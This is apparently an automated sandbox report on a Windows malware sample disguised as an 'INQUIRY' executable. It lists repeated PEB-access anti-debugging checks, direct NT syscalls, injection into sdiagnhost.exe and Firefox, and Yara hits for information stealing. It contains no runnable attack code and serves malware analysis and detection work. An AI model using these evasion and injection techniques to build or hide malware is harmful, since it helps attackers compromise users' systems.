Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0E908 mov eax, dword ptr fs:[00000030h]		0_2_01A0E908
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1C912 mov eax, dword ptr fs:[00000030h]		0_2_01A1C912
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A34978 mov eax, dword ptr fs:[00000030h]		0_2_01A34978
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A34978 mov eax, dword ptr fs:[00000030h]		0_2_01A34978
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1C97C mov eax, dword ptr fs:[00000030h]		0_2_01A1C97C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A64940 mov eax, dword ptr fs:[00000030h]		0_2_01A64940
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A10946 mov eax, dword ptr fs:[00000030h]		0_2_01A10946
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D096E mov eax, dword ptr fs:[00000030h]		0_2_019D096E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D096E mov edx, dword ptr fs:[00000030h]		0_2_019D096E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D096E mov eax, dword ptr fs:[00000030h]		0_2_019D096E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B6962 mov eax, dword ptr fs:[00000030h]		0_2_019B6962
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B6962 mov eax, dword ptr fs:[00000030h]		0_2_019B6962
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B6962 mov eax, dword ptr fs:[00000030h]		0_2_019B6962
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01990887 mov eax, dword ptr fs:[00000030h]		0_2_01990887
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1C89D mov eax, dword ptr fs:[00000030h]		0_2_01A1C89D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5A8E4 mov eax, dword ptr fs:[00000030h]		0_2_01A5A8E4
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE8C0 mov eax, dword ptr fs:[00000030h]		0_2_019BE8C0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CC8F9 mov eax, dword ptr fs:[00000030h]		0_2_019CC8F9
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CC8F9 mov eax, dword ptr fs:[00000030h]		0_2_019CC8F9
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A608C0 mov eax, dword ptr fs:[00000030h]		0_2_01A608C0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A3483A mov eax, dword ptr fs:[00000030h]		0_2_01A3483A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A3483A mov eax, dword ptr fs:[00000030h]		0_2_01A3483A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CA830 mov eax, dword ptr fs:[00000030h]		0_2_019CA830
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B2835 mov eax, dword ptr fs:[00000030h]		0_2_019B2835
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B2835 mov eax, dword ptr fs:[00000030h]		0_2_019B2835
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B2835 mov eax, dword ptr fs:[00000030h]		0_2_019B2835
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B2835 mov ecx, dword ptr fs:[00000030h]		0_2_019B2835
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B2835 mov eax, dword ptr fs:[00000030h]		0_2_019B2835
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B2835 mov eax, dword ptr fs:[00000030h]		0_2_019B2835
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1C810 mov eax, dword ptr fs:[00000030h]		0_2_01A1C810
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01994859 mov eax, dword ptr fs:[00000030h]		0_2_01994859
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01994859 mov eax, dword ptr fs:[00000030h]		0_2_01994859
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C0854 mov eax, dword ptr fs:[00000030h]		0_2_019C0854
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A26870 mov eax, dword ptr fs:[00000030h]		0_2_01A26870
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A26870 mov eax, dword ptr fs:[00000030h]		0_2_01A26870
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1E872 mov eax, dword ptr fs:[00000030h]		0_2_01A1E872
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1E872 mov eax, dword ptr fs:[00000030h]		0_2_01A1E872
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A2840 mov ecx, dword ptr fs:[00000030h]		0_2_019A2840
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A44BB0 mov eax, dword ptr fs:[00000030h]		0_2_01A44BB0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A44BB0 mov eax, dword ptr fs:[00000030h]		0_2_01A44BB0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0BBE mov eax, dword ptr fs:[00000030h]		0_2_019A0BBE
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0BBE mov eax, dword ptr fs:[00000030h]		0_2_019A0BBE
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B0BCB mov eax, dword ptr fs:[00000030h]		0_2_019B0BCB
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B0BCB mov eax, dword ptr fs:[00000030h]		0_2_019B0BCB
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B0BCB mov eax, dword ptr fs:[00000030h]		0_2_019B0BCB
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1CBF0 mov eax, dword ptr fs:[00000030h]		0_2_01A1CBF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01990BCD mov eax, dword ptr fs:[00000030h]		0_2_01990BCD
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01990BCD mov eax, dword ptr fs:[00000030h]		0_2_01990BCD
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01990BCD mov eax, dword ptr fs:[00000030h]		0_2_01990BCD
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BEBFC mov eax, dword ptr fs:[00000030h]		0_2_019BEBFC
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01998BF0 mov eax, dword ptr fs:[00000030h]		0_2_01998BF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01998BF0 mov eax, dword ptr fs:[00000030h]		0_2_01998BF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01998BF0 mov eax, dword ptr fs:[00000030h]		0_2_01998BF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A3EBD0 mov eax, dword ptr fs:[00000030h]		0_2_01A3EBD0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A58B28 mov eax, dword ptr fs:[00000030h]		0_2_01A58B28
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A58B28 mov eax, dword ptr fs:[00000030h]		0_2_01A58B28
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A64B00 mov eax, dword ptr fs:[00000030h]		0_2_01A64B00
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BEB20 mov eax, dword ptr fs:[00000030h]		0_2_019BEB20
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BEB20 mov eax, dword ptr fs:[00000030h]		0_2_019BEB20
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0EB1D mov eax, dword ptr fs:[00000030h]		0_2_01A0EB1D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0EB1D mov eax, dword ptr fs:[00000030h]		0_2_01A0EB1D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0EB1D mov eax, dword ptr fs:[00000030h]		0_2_01A0EB1D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0EB1D mov eax, dword ptr fs:[00000030h]		0_2_01A0EB1D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0EB1D mov eax, dword ptr fs:[00000030h]		0_2_01A0EB1D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0EB1D mov eax, dword ptr fs:[00000030h]		0_2_01A0EB1D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0EB1D mov eax, dword ptr fs:[00000030h]		0_2_01A0EB1D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0EB1D mov eax, dword ptr fs:[00000030h]		0_2_01A0EB1D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0EB1D mov eax, dword ptr fs:[00000030h]		0_2_01A0EB1D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01988B50 mov eax, dword ptr fs:[00000030h]		0_2_01988B50
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A38B42 mov eax, dword ptr fs:[00000030h]		0_2_01A38B42
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A26B40 mov eax, dword ptr fs:[00000030h]		0_2_01A26B40
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A26B40 mov eax, dword ptr fs:[00000030h]		0_2_01A26B40
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5AB40 mov eax, dword ptr fs:[00000030h]		0_2_01A5AB40
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0198CB7E mov eax, dword ptr fs:[00000030h]		0_2_0198CB7E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A44B4B mov eax, dword ptr fs:[00000030h]		0_2_01A44B4B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A44B4B mov eax, dword ptr fs:[00000030h]		0_2_01A44B4B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A62B57 mov eax, dword ptr fs:[00000030h]		0_2_01A62B57
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A62B57 mov eax, dword ptr fs:[00000030h]		0_2_01A62B57
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A62B57 mov eax, dword ptr fs:[00000030h]		0_2_01A62B57
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A62B57 mov eax, dword ptr fs:[00000030h]		0_2_01A62B57
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A3EB50 mov eax, dword ptr fs:[00000030h]		0_2_01A3EB50
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C8A90 mov edx, dword ptr fs:[00000030h]		0_2_019C8A90
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199EA80 mov eax, dword ptr fs:[00000030h]		0_2_0199EA80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199EA80 mov eax, dword ptr fs:[00000030h]		0_2_0199EA80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199EA80 mov eax, dword ptr fs:[00000030h]		0_2_0199EA80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199EA80 mov eax, dword ptr fs:[00000030h]		0_2_0199EA80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199EA80 mov eax, dword ptr fs:[00000030h]		0_2_0199EA80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199EA80 mov eax, dword ptr fs:[00000030h]		0_2_0199EA80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199EA80 mov eax, dword ptr fs:[00000030h]		0_2_0199EA80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199EA80 mov eax, dword ptr fs:[00000030h]		0_2_0199EA80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199EA80 mov eax, dword ptr fs:[00000030h]		0_2_0199EA80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A64A80 mov eax, dword ptr fs:[00000030h]		0_2_01A64A80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01998AA0 mov eax, dword ptr fs:[00000030h]		0_2_01998AA0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01998AA0 mov eax, dword ptr fs:[00000030h]		0_2_01998AA0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019E6AA4 mov eax, dword ptr fs:[00000030h]		0_2_019E6AA4
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01990AD0 mov eax, dword ptr fs:[00000030h]		0_2_01990AD0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C4AD0 mov eax, dword ptr fs:[00000030h]		0_2_019C4AD0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C4AD0 mov eax, dword ptr fs:[00000030h]		0_2_019C4AD0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019E6ACC mov eax, dword ptr fs:[00000030h]		0_2_019E6ACC
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019E6ACC mov eax, dword ptr fs:[00000030h]		0_2_019E6ACC
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019E6ACC mov eax, dword ptr fs:[00000030h]		0_2_019E6ACC
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CAAEE mov eax, dword ptr fs:[00000030h]		0_2_019CAAEE
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CAAEE mov eax, dword ptr fs:[00000030h]		0_2_019CAAEE
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CCA38 mov eax, dword ptr fs:[00000030h]		0_2_019CCA38
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B4A35 mov eax, dword ptr fs:[00000030h]		0_2_019B4A35
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B4A35 mov eax, dword ptr fs:[00000030h]		0_2_019B4A35
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1CA11 mov eax, dword ptr fs:[00000030h]		0_2_01A1CA11
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BEA2E mov eax, dword ptr fs:[00000030h]		0_2_019BEA2E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CCA24 mov eax, dword ptr fs:[00000030h]		0_2_019CCA24
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0A5B mov eax, dword ptr fs:[00000030h]		0_2_019A0A5B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0A5B mov eax, dword ptr fs:[00000030h]		0_2_019A0A5B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A3EA60 mov eax, dword ptr fs:[00000030h]		0_2_01A3EA60
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01996A50 mov eax, dword ptr fs:[00000030h]		0_2_01996A50

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtCreateFile: Direct from: 0x77752FEC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtOpenFile: Direct from: 0x77752DCC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtSetInformationThread: Direct from: 0x777463F9			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtQueryInformationToken: Direct from: 0x77752CAC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtTerminateThread: Direct from: 0x77752FCC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtProtectVirtualMemory: Direct from: 0x77752F9C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtSetInformationProcess: Direct from: 0x77752C5C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtNotifyChangeKey: Direct from: 0x77753C2C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtOpenKeyEx: Direct from: 0x77752B9C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtOpenSection: Direct from: 0x77752E0C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtProtectVirtualMemory: Direct from: 0x77747B2E			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtAllocateVirtualMemory: Direct from: 0x777548EC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtQueryVolumeInformationFile: Direct from: 0x77752F2C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtQuerySystemInformation: Direct from: 0x777548CC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtAllocateVirtualMemory: Direct from: 0x77752BEC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtDeviceIoControlFile: Direct from: 0x77752AEC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtCreateUserProcess: Direct from: 0x7775371C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtWriteVirtualMemory: Direct from: 0x7775490C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtQueryInformationProcess: Direct from: 0x77752C26			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtResumeThread: Direct from: 0x77752FBC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtReadVirtualMemory: Direct from: 0x77752E8C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtCreateKey: Direct from: 0x77752C6C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtSetInformationThread: Direct from: 0x77752B4C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtQueryAttributesFile: Direct from: 0x77752E6C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtAllocateVirtualMemory: Direct from: 0x77753C9C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtClose: Direct from: 0x77752B6C
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtUnmapViewOfSection: Direct from: 0x77752D3C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtCreateMutant: Direct from: 0x777535CC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtWriteVirtualMemory: Direct from: 0x77752E3C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtMapViewOfSection: Direct from: 0x77752D1C			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtResumeThread: Direct from: 0x777536AC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtReadFile: Direct from: 0x77752ADC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtQuerySystemInformation: Direct from: 0x77752DFC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtDelayExecution: Direct from: 0x77752DDC			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	NtAllocateVirtualMemory: Direct from: 0x77752BFC			Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Section loaded: NULL target: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Section loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: NULL target: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: NULL target: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Thread register set: target process: 5928

Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Thread APC queued: target process: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe

Jump to behavior

Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: gBSE2iEQW.exe, 00000007.00000000.1601979012.0000000001531000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000002.2481960195.0000000001530000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000009.00000000.1762471202.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: gBSE2iEQW.exe, 00000007.00000000.1601979012.0000000001531000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000002.2481960195.0000000001530000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000009.00000000.1762471202.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: gBSE2iEQW.exe, 00000007.00000000.1601979012.0000000001531000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000002.2481960195.0000000001530000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000009.00000000.1762471202.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: gBSE2iEQW.exe, 00000007.00000000.1601979012.0000000001531000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000002.2481960195.0000000001530000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000009.00000000.1762471202.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information

Source: Yara match	File source: 0.2.INQUIRY 02825 AISISAE 9310.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2480301327.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1694455454.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1699741449.00000000068F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2481831657.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
